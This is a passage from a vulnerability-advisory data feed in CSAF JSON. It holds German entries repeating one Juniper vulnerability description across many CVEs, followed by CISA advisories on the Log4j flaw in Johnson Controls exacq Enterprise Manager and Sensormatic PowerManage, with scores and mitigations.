{ "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-38023" }, { "cve": "CVE-2022-37434", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-37434" }, { "cve": "CVE-2022-3707", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3707" }, { "cve": "CVE-2022-3628", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3628" }, { "cve": "CVE-2022-3625", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3625" }, { "cve": "CVE-2022-3623", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3623" }, { "cve": "CVE-2022-3619", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3619" }, { "cve": "CVE-2022-3567", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3567" }, { "cve": "CVE-2022-3566", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3566" }, { "cve": "CVE-2022-3564", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3564" }, { "cve": "CVE-2022-3524", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3524" }, { "cve": "CVE-2022-3239", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3239" }, { "cve": "CVE-2022-30594", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-30594" }, { "cve": "CVE-2022-3028", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-3028" } ] }
icsa-21-357-02
Vulnerability from csaf_cisa
Notes
{ "document": { "acknowledgments": [ { "organization": "Johnson Controls, Inc", "summary": "reporting this vulnerability to CISA" } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Disclosure is not limited", "tlp": { "label": "WHITE", "url": "https://us-cert.cisa.gov/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "title": "CISA Disclaimer" }, { "category": "legal_disclaimer", "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.", "title": "Legal Notice" }, { "category": "summary", "text": "Successful exploitation of this vulnerability could allow an attacker to enter malicious input resulting in remote code execution.", "title": "Risk evaluation" }, { "category": "other", "text": "Critical Manufacturing", "title": "Critical infrastructure sectors" }, { "category": "other", "text": "Worldwide", "title": "Countries/areas deployed" }, { "category": "other", "text": "Ireland", "title": "Company headquarters location" }, { "category": "general", "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. 
Specifically, users should:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.", "title": "Recommended Practices" }, { "category": "other", "text": "No known public exploits specifically target this vulnerability.", "title": "Exploitability" } ], "publisher": { "category": "coordinator", "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870", "name": "CISA", "namespace": "https://www.cisa.gov/" }, "references": [ { "category": "self", "summary": "ICS Advisory ICSA-21-357-02 JSON", "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2021/icsa-21-357-02.json" }, { "category": "self", "summary": "ICS Advisory ICSA-21-357-02 Web Version", "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-357-02" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01" }, { "category": "external", "summary": "Recommended Practices", "url": 
"https://www.cisa.gov/uscert/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B" } ], "title": "Johnson Controls exacq Enterprise Manager", "tracking": { "current_release_date": "2021-12-23T00:00:00.000000Z", "generator": { "engine": { "name": "CISA CSAF Generator", "version": "1.0.0" } }, "id": "ICSA-21-357-02", "initial_release_date": "2021-12-23T00:00:00.000000Z", "revision_history": [ { "date": "2021-12-23T00:00:00.000000Z", "legacy_version": "Initial", "number": "1", "summary": "Publication Date" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c= 21.12", "product": { "name": "Exacq Enterprise Manager: All Versions 21.12 and prior", "product_id": "CSAFPID-0001" } } ], "category": "product_name", "name": "Exacq Enterprise Manager" } ], "category": "vendor", "name": "Exacq Technologies, Johnson Controls Inc." } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "An attacker could enter malicious data into the affected product, causing remote code execution.CVE-2021-44228 has been assigned to this vulnerability. 
A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Johnson Controls recommends upgrading exacq Enterprise Manager to Version 21.12.1 or apply manual mitigation steps (available upon request).", "product_ids": [ "CSAFPID-0001" ], "url": "https://exacq.com/support/downloads.php?section=esm" }, { "category": "mitigation", "details": "Refer to the exacq Hardening Guide for guidance on isolating exacqVision NVRs and Enterprise Manager from public facing networks to reduce network exposure to attacks.", "product_ids": [ "CSAFPID-0001" ], "url": "https://www.johnsoncontrols.com/cyber-solutions/cyber-learning" }, { "category": "mitigation", "details": "For more detailed mitigation instructions, please see Johnson Controls Product Security Advisory JCI-PSA-2021-24 v1", "product_ids": [ "CSAFPID-0001" ], "url": "https://www.johnsoncontrols.com/-/media/jci/cyber-solutions/product-security-advisories/2021/jci-psa-2021-24_exacqvision-em.pdf" }, { "category": "mitigation", "details": "Further ICS security notices and product security guidance are located at Johnson Controls product security website.", "product_ids": [ "CSAFPID-0001" ], "url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories" } ], "scores": [ { "cvss_v3": { "baseScore": 10.0, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001" ] } ] } ] }
icsa-22-034-01
Vulnerability from csaf_cisa
Notes
{ "document": { "acknowledgments": [ { "organization": "Johnson Controls, Inc", "summary": "reporting this vulnerability to CISA" } ], "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Disclosure is not limited", "tlp": { "label": "WHITE", "url": "https://us-cert.cisa.gov/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "title": "CISA Disclaimer" }, { "category": "legal_disclaimer", "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.", "title": "Legal Notice" }, { "category": "summary", "text": "Successful exploitation of this vulnerability could allow an attacker to gain remote code execution.", "title": "Risk evaluation" }, { "category": "other", "text": "Critical Manufacturing", "title": "Critical infrastructure sectors" }, { "category": "other", "text": "Worldwide", "title": "Countries/areas deployed" }, { "category": "other", "text": "Ireland", "title": "Company headquarters location" }, { "category": "general", "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. 
Specifically, users should:", "title": "Recommended Practices" }, { "category": "general", "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.", "title": "Recommended Practices" }, { "category": "general", "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.", "title": "Recommended Practices" }, { "category": "other", "text": "No known public exploits specifically target this vulnerability.", "title": "Exploitability" } ], "publisher": { "category": "coordinator", "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870", "name": "CISA", "namespace": "https://www.cisa.gov/" }, "references": [ { "category": "self", "summary": "ICS Advisory ICSA-22-034-01 JSON", "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2022/icsa-22-034-01.json" }, { "category": "self", "summary": "ICS Advisory ICSA-22-034-01 Web Version", "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-034-01" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01" }, { "category": "external", "summary": "Recommended Practices", "url": 
"https://www.cisa.gov/uscert/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" }, { "category": "external", "summary": "Recommended Practices", "url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B" } ], "title": "Sensormatic PowerManage (Update A)", "tracking": { "current_release_date": "2022-03-08T00:00:00.000000Z", "generator": { "engine": { "name": "CISA CSAF Generator", "version": "1.0.0" } }, "id": "ICSA-22-034-01", "initial_release_date": "2022-02-03T00:00:00.000000Z", "revision_history": [ { "date": "2022-02-03T00:00:00.000000Z", "legacy_version": "Initial", "number": "1", "summary": "ICSA-22-034-01 Sensormatic PowerManage" }, { "date": "2022-03-08T00:00:00.000000Z", "legacy_version": "A", "number": "2", "summary": "ICSA-22-034-01 Sensormatic PowerManage (Update A)" } ], "status": "final", "version": "2" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003e= 4.0 | \u003c= 4.8", "product": { "name": "PowerManage: Versions 4.0 to 4.8", "product_id": "CSAFPID-0001" } } ], "category": "product_name", "name": "PowerManage" } ], "category": "vendor", "name": "Sensormatic Electronics, LLC, Johnson Controls Inc." } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The affected product does not properly validate user input, allowing an attacker to enter malicious input and potentially gain remote code execution.CVE-2021-44228 has been assigned to this vulnerability. 
A CVSS v3 base score of 10.0 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).", "title": "Vulnerability Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001" ] }, "references": [ { "category": "external", "summary": "web.nvd.nist.gov", "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44228" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], "remediations": [ { "category": "vendor_fix", "details": "Upgrade PowerManage to Version 4.10", "product_ids": [ "CSAFPID-0001" ], "url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories" }, { "category": "mitigation", "details": "For more detailed mitigation instructions, please see Johnson Controls Product Security Advisory JCI-PSA-2022-01 v1", "product_ids": [ "CSAFPID-0001" ], "url": "https://www.johnsoncontrols.com/cyber-solutions/security-advisories" } ], "scores": [ { "cvss_v3": { "baseScore": 10.0, "baseSeverity": "CRITICAL", "vectorString": 